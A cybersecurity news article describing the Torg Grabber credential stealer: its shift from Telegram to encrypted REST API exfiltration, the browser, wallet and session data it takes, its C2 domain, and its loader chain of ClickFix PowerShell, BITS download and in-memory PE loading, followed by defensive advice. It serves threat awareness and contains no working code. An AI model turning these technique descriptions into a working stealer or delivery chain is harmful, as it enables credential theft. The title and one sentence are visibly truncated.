Torg Grabber Stealer Uses Encrypted REST API for Moves From

A new credential stealer, dubbed Torg Grabber, has emerged as a rapidly evolving Malware-as-a-Service (MaaS) offering. Within just three months, this stealer has demonstrated significant development, shifting its exfiltration method from Telegram to an encrypted REST API for command-and-control (C2) operations. This evolution highlights a growing sophistication in

Starting with simple Telegram-based data exfiltration, it matured into a fully encrypted REST API command-and-control (C2) infrastructure.

With 334 samples compiled in that short period and more than 40 confirmed operator tags found in the binaries, Torg Grabber is actively serving multiple criminal buyers — a clear sign of an organized, builder-based cybercrime operation running at scale.

The malware takes its name from one of its most-used C2 domains, technologytorg.com, where “torg” is a Russian word meaning “trade” or “marketplace” — fitting for a tool built to deal in stolen credentials.

The discovery started when a sample arrived in the lab mislabeled as Vidar Stealer. Closer inspection exposed the problem: the binary was a 64-bit PE compiled with MinGW-GCC, while Vidar is a 32-bit MSVC build.

A self-identifying debug string, “grabber v1.0,” was found embedded in the code, and the C2 protocol used REST API endpoints with ChaCha20 encryption and HMAC-SHA256 authentication — none of it resembling Vidar’s architecture.

Gen Digital’s Threat Research Team identified and formally named the malware after dissecting its binary in their lab. Analysts confirmed that Torg Grabber evolved through three distinct exfiltration phases over its short lifespan.

The earliest builds, active from December 9 to 11, 2025, sent stolen ZIP archives to private Telegram channels through the Telegram Bot API — a fast, zero-infrastructure approach.

From December 17 to 20, the malware briefly switched to a raw TCP socket protocol using a custom 9-byte binary frame with ChaCha20-Poly1305 encryption.

Beginning December 18, it transitioned to production-grade REST API over HTTPS routed through Cloudflare, making traffic interception and domain-based blocking far more difficult.

The malware’s appetite for data casts a wide net. It targets credentials from 25 Chromium-based browsers and 8 Firefox-family browsers, collects over 850 browser extensions including cryptocurrency wallets and two-factor authentication tools, and grabs session data from Discord, Telegram, and Steam.

VPN configs, FTP client data, and desktop screenshots are also collected. Before any collection begins, Torg Grabber checks for 46 antivirus signatures across 24 security products to see what defenses are in place.

Eight of the confirmed operator tags were resolved to live Telegram accounts linked to Russian-speaking cybercrime networks.

The Loader Chain: From Dropper to In-Memory Execution

Torg Grabber does not arrive on a victim’s machine alone. It is wrapped in a multi-stage loader chain that strips away layer after layer before the actual stealer ever reaches memory.

The outer layer, known as Stage 0, is the dropper. Victims encounter it as fake game cheats, cracked software packages, or ClickFix clipboard attacks hosted on Google Apps Script.

In a confirmed infection from January 30, 2026, a malicious page quietly placed a PowerShell command in the clipboard and told the user to paste and run it.

This triggered a hidden BITS Transfer download that ran through Windows’ own svchost.exe, blending into legitimate system traffic and evading many endpoint tools.

Stage 1 is a self-extracting loader carrying an AES-256-CBC encrypted overlay appended beyond the binary’s normal section data.

It processes the payload through custom hex decoding and AES decryption, then resolves Windows NT API calls at runtime using direct syscalls, leaving no visible imports for static analysis tools to detect.

Stage 2 operates entirely in memory as a reflective PE loader, mapping the final stealer payload without writing anything to disk. By the time Stage 3 activates, the stealer is running inside a live process with nothing on disk to scan or flag.

Users should avoid downloading software from unofficial sources, game cheat sites, or cracked application platforms. IT teams should watch for PowerShell commands with base64-encoded arguments and unexpected BITS Transfer job creation.

Endpoint tools should be configured to flag direct syscall usage and in-memory PE loading patterns.

Organizations running Chromium-based browsers should confirm that App-Bound Encryption is properly configured, and any unexpected browser process suspension during normal activity should be treated as a potential indicator of compromise.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.